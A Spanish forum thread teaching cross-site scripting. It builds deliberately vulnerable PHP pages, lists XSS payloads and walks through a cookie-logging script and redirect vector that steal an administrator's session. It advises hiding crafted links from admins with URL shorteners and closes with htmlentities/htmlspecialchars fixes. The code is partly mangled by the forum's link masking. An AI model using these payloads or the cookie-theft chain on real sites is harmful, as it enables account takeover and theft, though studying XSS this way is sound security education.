comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Taller de Seguridad Web #1

  • 36 Respuestas
  • 22431 Vistas

mgeohana y 8 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    43.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Septiembre 14, 2014, 05:13:14 pm »

1. Introducción.

La sigla XSS significa Cross Site Scripting, el motivo por el cual no se abrevia CSS, es para no confundirlo con las hojas de estilo.
El XSS es una vulnerabilidad muy popular hoy en día y según estadísticas de OWASP, el 90% de los sitios webs son vulnerables y el 70% de esas poseen XSS.

A pesar de que el XSS sea una vulnerabilidad antigua, hasta el día de hoy siguen apareciendo nuevos vectores para explotarla.
Esta vulnerabilidad de seguridad permite a un atacante insertar código HTML o Javascript a un formulario web con el fin de poder obtener información para luego sacarle provecho. Normalmente se utiliza para robar las Cookies del administrador de algún sitio y luego poder usarlas para loguearse con ella. Aunque también es utilizado para hacer Phishing, defaces, etc.

El XSS surge como consecuencia de errores de filtrado de las entradas de usuarios en los sitios web.

Esta vulnerabilidad se suele encontrar la mayoría de las veces en buscadores de páginas webs. Pero en realidad se puede hallar en cualquier sitio que contenga formularios, como lo son formularios de registros, libros de visitas, entre otros.

Los XSS se clasifican de dos formas:

Persistente:

Los XSS Persistentes o Stored, son aquellos que quedan guardados en el sitio vulnerable y puede afectar a cualquier persona que ingrese al website, ya que queda alojado en el sitio y cada persona que entre se verá afectada por el.
Este tipo de vulnerabilidad es muy difícil de encontrar y suele verse en libros de visitas, o algún tipo de formulario de carga. Con esto se podría llegar a hacer un deface colocando un div que ocupe toda la página o con alguna redirección hacia otro sitio.

Reflejado:

El XSS reflejado es aquel que no queda almacenado en la web vulnerable, pero nos puede servir si el XSS viaja por la URL. De esta forma podríamos por medio de la URL, ejecutarle el script a alguien.
Si bien es más difícil sacarle provecho, suele verse en una gran cantidad de sitios, en especial si son buscadores.


2. Taller Práctico | Explotando la Vulnerabilidad.

Reflejado:

En esta primera parte del taller montaremos una plataforma vulnerable a XSS reflejado. Para ello necesitaremos tener un host para montarlo o simplemente tener instalado XAMPP/WAMP en nuestra máquina.

Algo muy importante es que usen Firefox, ya que en otros navegadores, a veces no se muestran las alertas.

Lo que haremos ahora, será abrir un bloc de notas y pondremos el siguiente código:

index.html

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2.         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3.                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Underc0de XSS Reflejado</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  4.         </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  5.         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  6. <center>
  7.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta src="logo.png">
  8.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta action="buscador.php" method="get">
  9.                         Buscador: <No tienes permisos para ver links. Registrate o Entra con tu cuenta name="buscar" value="" size="50">
  10. <No tienes permisos para ver links. Registrate o Entra con tu cuenta/>
  11.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta type="submit" value="Buscar"/>
  12.                         </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  13.                 </center>      
  14. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  15. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  16.  


Una vez guardado, abriremos nuevamente el bloc de notas y pondremos lo siguiente:

buscador.php
Código: PHP
  1. <html>
  2.         <head>
  3.                 <title>Resultado de la busqueda</title>
  4.         </head>
  5.         <body>
  6. <center>
  7.                         <img src="logo.png">
  8.                         <?php
  9.                         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET[“buscar”]))
  10.                 {
  11.                   $busqueda= $_GET[“buscar”];
  12.                 echo "<p align='center'>No se ha encontrado ningun resultado que contenga:" . $busqueda . "</p>";      
  13.                 }
  14.                 ?>
  15.                 </center>      
  16. </body>
  17. </html>


Básicamente lo que hacen estos archivos, es:

El archivo index.html contiene un input en el cual se le ingresa la palabra a buscar. Al presionar sobre el botón buscar, envía esa palabra ingresada al archivo buscador.php y esta muestra esa palabra.

Una vez hecho y comprendido esto, los guardamos y colocamos a ambos ficheros dentro de un directorio dentro de la carpeta htdocs o www (dependiendo de si se usa wamp o xampp), en mi caso se llamara XSS.
 
Accedemos desde el navegador a nuestro directorio:

En mi caso, sería: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Deberíamos ver algo como esto:


Para probar si funciona, colocaremos alguna palabra y presionaremos en el botón buscar:

El resultado será el siguiente:



Como podemos ver, la palabra insertada en el input, es mostrada en este formulario y si miramos la url, podremos observar que dicha palabra también viaja por ahí:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Como dijimos en un principio, esta vulnerabilidad permite inyectar código HTML en la aplicación web. Para ello colocaremos <h1>Underc0de</h1> y veremos qué es lo que pasa:



Con esto podríamos casi afirmar que esta web es vulnerable a XSS. Para terminar de despejarnos las dudas, insertaremos lo siguiente:

<script>alert('XSS');</script>



Y aquí tenemos nuestro XSS reflejado.

Como podrán ver, en todas las capturas he puesto las URL, y en este caso tenemos:

No tienes permisos para ver links. Registrate o Entra con tu cuenta<script>alert(‘xss’);</script>

La cual podemos pasar a alguien y así poder ejecutarle el script.

Algo que se suele hacer, es ocultar la URL con algún acortador de direcciones para pasar desapercibido.

Algunas aclaraciones a tener en cuenta:

Vector: <script>alert('XSS');</script>

El vector puede ir variando dependiendo de cómo esté hecho el formulario en donde se está inyectando.

En este caso es fácil, ya que el archivo busqueda.php muestra lo mismo que ingresamos en el index.html

Existen varias variantes para los vectores tales como:

"><script>alert('XSS');</script>
<script>alert(/XSS/);</script>


También podemos utilizar números, con los cuales no hace falta usar comillas ni barras

<script>alert(9);</script>
<script>alert(document.cookie);</script>
<imgsrc='javascript: alert(/XSS/); //.jpg' >


También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3ealert(/XSS/);%3C%2Fscript%3e

Otra de las cosas que se pueden hacer es un bucle:

<script>for(;;)alert("bucle");</script>

Entre muchísimos más que se pueden utilizar dependiendo el sitio web.

Persistente:

Como bien habíamos dicho antes, el XSS persistente es aquel que queda alojado en la vulnerable y puede afectar a todo aquel que lo visite.

A continuación haremos un estilo de libro de visitas el cual será vulnerable a XSS. Para ello, abrimos el bloc de notas, y colocamos el siguiente código:

Index.php

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2.         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3.                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Libro de visitas</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  4.         </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  5.         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  6.                 <center>
  7.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  8.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Libro de visitas</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  9.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  10.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta action="enviar.php" method="POST">
  11.                                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta name="nombre"type="text"value="Ingresa tu nombre">
  12.                                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta><No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  13.                                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta name="comentario">Ingresa tu comentario</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  14.                                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta><No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  15.                                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta name="enviar" type="submit" value="Enviar">
  16.                         </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  17.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  18.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Comentarios enviados</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  19.                         <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  20.                         <?phpreadfile('comentarios.txt'); ?>
  21.                 </center>
  22.         </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  23. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>


Enviar.php

Código: PHP
  1. <?php
  2. $nombre = $_POST['nombre'];
  3. $comentario = $_POST['comentario'];
  4. $fecha =No tienes permisos para ver links. Registrate o Entra con tu cuenta("j-n-Y h:i:s" );
  5. $fp=No tienes permisos para ver links. Registrate o Entra con tu cuenta("comentarios.txt","a+" );
  6. $salida='
  7.                         <div>'.$nombre.', publicado el '.$fecha.'</div>
  8.                         <div>'.$comentario.'</div>
  9.                         <hr>';
  10. No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp,$salida);
  11. No tienes permisos para ver links. Registrate o Entra con tu cuenta($fp);
  12. No tienes permisos para ver links. Registrate o Entra con tu cuenta("Location:index.php" );
  13. ?>


Finalmente, creamos un archivo vacío llamado comentarios.txt con permisos de escritura, ya que ahí se guardaran los comentarios de nuestro libro de visitas.

Al igual que al script anterior, lo colocamos en nuestro servidor e ingresamos desde el navegador.

Tendremos algo como esto:


Colocamos nuestro nombre en el campo para ingresar nombre, y en el comentario colocamos el siguiente vector:

<script>alert(/XSS/)</script>


Al dar en el botón enviar, nuestro vector se almacenará en el libro de visitas y cada vez que alguien ingrese al sitio, se ejecutara el script.



3. Robo de Cookies | Uso de estas.

Según Wikipedia,
Una cookie (o galleta informática) es una pequeña información enviada por un sitio web y almacenada en el navegador del usuario, de manera que el sitio web puede consultar la actividad previa del usuario.

Y una de sus principales funciones es:

Llevar el control de usuarios: cuando un usuario introduce su nombre de usuario y contraseña, se almacena una cookie para que no tenga que estar introduciéndolas para cada página del servidor.

En este taller aprenderemos a sacar las cookies de alguna persona que entre al libro de visitas, y si esa persona es el administrador, sus cookies se podrían utilizar para poder hacernos pasar por él, y entrar al panel de administración del sitio web.

Para ello, crearemos el siguiente archivo en php

cookies.php

Código: PHP
  1. <?
  2. $cookie = $_GET['cookie'];
  3. $fff=No tienes permisos para ver links. Registrate o Entra con tu cuenta("cookies.txt","a");
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta($fff, "$cookie\n");
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta($fff);
  6. ?>


Además, en el mismo path en el que estará el archivo cookies.php, debemos crear uno llamado cookies.txt vacio con permisos de escritura.

Ahora nos dirigimos a la página vulnerable y utilizaremos el siguiente vector para capturar las cookies de las personas que ingresen:

<script>window.location='No tienes permisos para ver links. Registrate o Entra con tu cuenta</script>

Reemplazar No tienes permisos para ver links. Registrate o Entra con tu cuenta por la dirección a donde tenemos alojado el script.

Antes de crear el mensaje con la inyección, debemos recordar, que si lo introducimos, siempre que iniciemos al libro de visitas, nos redirigirá al archivo cookie.php por lo que, después de que el administrador haya entrado al sitio, deberemos de editar el mensaje, para eso, vamos a fijarnos en las urls.



Una vez creado, vamos a editar nuestro propio mensaje, copiando la url para después poder volver a editarlo sin entrar al index.



Y ahora sí, lo editamos por nuestra inyección.


Editamos el mensaje y observamos que nos ha redirigido a nuestro propio archivo.


Descartando esa cookie,ya que es la nuestra, esperaremos a que el administrador acceda al sitio.

Minutos después, comprobamos el fichero cookies.txt y observamos esto:


Sabiendo que la primera es nuestra cookie, vamos  a probar con la segunda, esperando a que sea la de un administrador.

Volvemos a nuestra url, para editar el mensaje que habíamos creado, pudiendo así acceder de nuevo al index.


Ahora, para utilizar la cookie que hemos robado, podemos usar varias extensiones, entre ellas, live http headers, tamper data, y cookie manager +, etc…

Buscamos nuestra cookie y la editamos por la que hemos conseguido:


Dejándola así:


Guardamos los cambios y refrescamos el libro de visitas.

Y bingo! Tenemos acceso a la administración.


En caso de que tengamos un XSS reflejado en algún sitio, deberemos armar toda la URL con el vector para robar la cookie, y pasarle esa url a la persona que deseemos, que por lo general suele ser a los admines de las páginas. Pero por lo general, esas urls armadas suelen ser muy evidentes, por lo que se utilizan acortadores de urls para que no sospechen.


4. Arreglando la Vulnerabilidad.

Existen varias formas de solucionar la vulnerabilidad, las más usadas es por medio de:

Conhtmlentities() todos los caracteres que tienen equivalente HTML son convertidos  y de esta forma no deja ni abrir ni cerrar etiquetas HTML. Para aplicarlo al formulario del libro de visitas, simplemente debemos modificar las líneas en donde se pasan las variables $nombre y $comentario, dejándolos de la siguiente forma:
Código: HTML5
  1.                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta>'.htmlentities($nombre).', publicado el '.$fecha.'</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2.                 <No tienes permisos para ver links. Registrate o Entra con tu cuenta>'.htmlentities($comentario).'</No tienes permisos para ver links. Registrate o Entra con tu cuenta>

Una vez modificado, los scripts ya no se ejecutaran en el navegador y nos mostrara correctamente el texto ingresado.


De la misma manera,  solucionaremos la vulnerabilidad en el archivo buscador.php



La otra forma es con htmlspecialchars(), la cual convierte caracteres especiales en entidades HTML y realiza las siguientes conversiones:

•   '"' (comillas dobles) se convierte en '&quot;' cuando ENT_NOQUOTESno está establecido.
•   "'" (comilla simple) se convierte en ''' (o &apos;) sólo cuando ENT_QUOTESestá establecido.
•   '<' (menor que) se convierte en '&lt;'
•   '>' (mayor que) se convierte en '&gt;'
•   '&' (et) se convierte en '&amp;'

Suponiendo que se tiene el siguiente código vulnerable:

Código: PHP
  1. <?php
  2. $pag = $_GET['page'];
  3. if($pag=="index"){
  4.         echo"index";
  5. }
  6. elseif($pag!= ""){
  7. echo"Error: ".$pag." No existe.";
  8. }
  9. ?>

Se aplica de la siguiente forma:

Código: PHP
  1. <?php
  2. $pag = $_GET['page'];
  3. if($pag=="index"){
  4.         echo"index";
  5. }
  6. elseif($pag!= ""){
  7. $pagg=No tienes permisos para ver links. Registrate o Entra con tu cuenta($pag, ENT_QUOTES);
  8. echo"Error: ".$pagg." No existe.";
  9. }
  10. ?>

Ambas son similares htmlspecialchars() convierte caracteres que se usan para trabajar con HTML (<, >, ", ' y &), htmlentities() traduce todos aquellos que tengan un equivalente a HTML además de los mencionados antes (Por Ejemplo: vocales acentuadas).

Tutores: Blackdrake - ANTRAX

No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Febrero 14, 2017, 07:31:22 pm por rollth »


Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« Respuesta #1 en: Septiembre 14, 2014, 06:30:48 pm »
Genial!!!!

Ahora me guardo el pdf con los otros. Espero ver los demas mas adelante.

Saludos

Desconectado Flemon

  • *
  • Underc0der
  • Mensajes: 235
  • Actividad:
    0%
  • Reputación 0
  • NO HAY FORMA DE DETENERME!!
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 14, 2014, 06:49:24 pm »
Muy bueno, Esta perfectamente detallado... Muchas Gracias bro, son muy buenos Talleres los que se hacen en Underc0de..
No intentes pararme, trata de defenderte, trata de matarme, pero de cualqueir forma TE SUPERARE

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #3 en: Septiembre 14, 2014, 08:15:38 pm »
Si alguien tiene alguna pregunta/duda/sugerencia, que lo escriba sin dudarlo.

Un saludo y gracias a todos por sus comentarios ^^



Desconectado n4pst3r

  • *
  • Underc0der
  • Mensajes: 41
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • r00tc0d3rs
    • Email
  • Skype: n4pst3rh4ck
« Respuesta #4 en: Septiembre 16, 2014, 12:10:16 am »
blackdrake & ANTRAX, que buen taller va directo a la coleccion, Gracias

Saludos

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #5 en: Septiembre 16, 2014, 10:45:29 pm »
Muy Bueno.

Espero para la próxima entrega algo sobre xss worm y DOM XSS.

Saludos.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #6 en: Septiembre 16, 2014, 11:53:15 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Muy Bueno.

Espero para la próxima entrega algo sobre xss worm y DOM XSS.

Saludos.

Hey bro porque tu armas una entrega explicando esos puntos?

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado 8-Matrix-8

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
  • 1,618033988..
    • Ver Perfil
« Respuesta #7 en: Septiembre 17, 2014, 12:40:08 am »
Muy bueno! No creí que habria tantos sites gubernamentales con la vulnerabilidad xss reflejado.

Gracias por el taller!

Desconectado deeps_vee

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Febrero 07, 2015, 11:34:47 pm »
Una pregunta como puedo hacer para que me funcione el codigo de la primera parte que esta en php ya que me salta un errror. Copie el codigo igualito lo revise mil veces cambie algunas partes que me parecieron que podrian probocar el problema pero ni idea.Si alguno tuvo el mismo problema que me diga como lo suluciono porfavor
Chau nos leemos

Conectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #9 en: Febrero 07, 2015, 11:47:50 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Una pregunta como puedo hacer para que me funcione el codigo de la primera parte que esta en php ya que me salta un errror. Copie el codigo igualito lo revise mil veces cambie algunas partes que me parecieron que podrian probocar el problema pero ni idea.Si alguno tuvo el mismo problema que me diga como lo suluciono porfavor
Chau nos leemos

Te puedes descargar la web directamente...
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado willymtx

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Febrero 17, 2015, 11:32:15 am »
Muy bueno el taller... lo pondre en practica. Gracias  8)

Desconectado D3ivid

  • *
  • Underc0der
  • Mensajes: 288
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Email
  • Twitter: @deividventas
« Respuesta #11 en: Febrero 17, 2015, 03:11:59 pm »
genial tuto y haciendo las practicas en xampp :)

Desconectado deeps_vee

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #12 en: Marzo 04, 2015, 10:29:57 pm »
Me quedo una duda en esto capas te salteaste una letra o no entendi algo porque pones cuando va > ecribis %3 y no pones %3e porque buscando por internet encontré que se usa para ese símbolo eso %3e

Es en esta parte donde aparece eso
Citar
También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3alert(/XSS/);%3C%2Fscript%3
Saludos y gracias por el taller

Desconectado blozzter

  • *
  • Underc0der
  • Mensajes: 106
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • blozzter-blz
« Respuesta #13 en: Marzo 05, 2015, 12:12:09 pm »
Excelente material. Gracias.
¡< blozzter >!

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #14 en: Marzo 05, 2015, 02:20:46 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Me quedo una duda en esto capas te salteaste una letra o no entendi algo porque pones cuando va > ecribis %3 y no pones %3e porque buscando por internet encontré que se usa para ese símbolo eso %3e

Es en esta parte donde aparece eso
Citar
También se pueden filtrar los <> y la barra / utilizando caracteres hexadecimales:

%3Cscript%3alert(/XSS/);%3C%2Fscript%3
Saludos y gracias por el taller

En efecto es %3E, lamentamos el error, ahora mismo lo modifico.

Un saludo.



Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #15 en: Marzo 05, 2015, 04:42:38 pm »
Muy bueno, respecto al tema de utilizar Firefox, no necesariamente debes utilizar Firefox. Como sabéis Chrome tiene el XSS Auditor cuya función es detectar posibles ataques, etc...
Si queremos realizar una prueba de concepto podemos abrirlo con el flag:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
--disable-web-security
Lo cual nos permitirá la libre ejecución de código JS, inyecciones XSS entre otros, para los que no sepan arrancar la flag la sintaxis sería algo así:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
"ruta de google chrome ejecutable" --args --disable-web-security
Por lo demás chapó! ;)
Un saludo!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado D3ivid

  • *
  • Underc0der
  • Mensajes: 288
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Email
  • Twitter: @deividventas
« Respuesta #16 en: Marzo 05, 2015, 07:30:15 pm »
Muchas gracias por lo que a mi me toca MagoAstral desconocia le XSSauditor de chrome ya lo tengo activado xD

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 286
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
« Respuesta #17 en: Marzo 08, 2015, 04:46:31 pm »
Muchas gracias. me servira de gran utilidad, saludos

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
  • Éxito o fracaso, libertad o condena.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« Respuesta #18 en: Marzo 31, 2015, 08:24:30 pm »
Hay un error en la programación de buscador.php

Citar
Parse error: syntax error, unexpected 'align' (T_STRING) in /home/u387232811/public_html/buscador.php on line 12

En la línea 12:
Citar
echo‘<p align=”center”>No se ha encontrado

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    43.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #19 en: Marzo 31, 2015, 08:34:09 pm »
Muchas gracias por notificarlo...
Proba poniendole vos las comillas. Cuando lo escribí en Word, puede que haya tomado las comillas de ahí y son diferentes.

Saludos!
ANTRAX


 

¿Te gustó el post? COMPARTILO!



Taller de pentesting con Kali Linux - Parte I

Iniciado por ANTRAX

Respuestas: 57
Vistas: 33484
Último mensaje Octubre 26, 2018, 11:01:57 am
por octopus
Taller de Pentesting con Kali Linux #2

Iniciado por ANTRAX

Respuestas: 32
Vistas: 22529
Último mensaje Noviembre 10, 2017, 07:40:18 am
por Brittsman97
Taller de Programacion en Batch #2

Iniciado por ANTRAX

Respuestas: 9
Vistas: 6260
Último mensaje Junio 03, 2015, 11:08:02 am
por ShineW
Taller de Programacion en Android #1

Iniciado por ANTRAX

Respuestas: 16
Vistas: 9269
Último mensaje Septiembre 27, 2015, 05:55:57 pm
por www
Taller Programación en Batch #1

Iniciado por ANTRAX

Respuestas: 5
Vistas: 10194
Último mensaje Octubre 21, 2014, 04:53:53 pm
por drotha2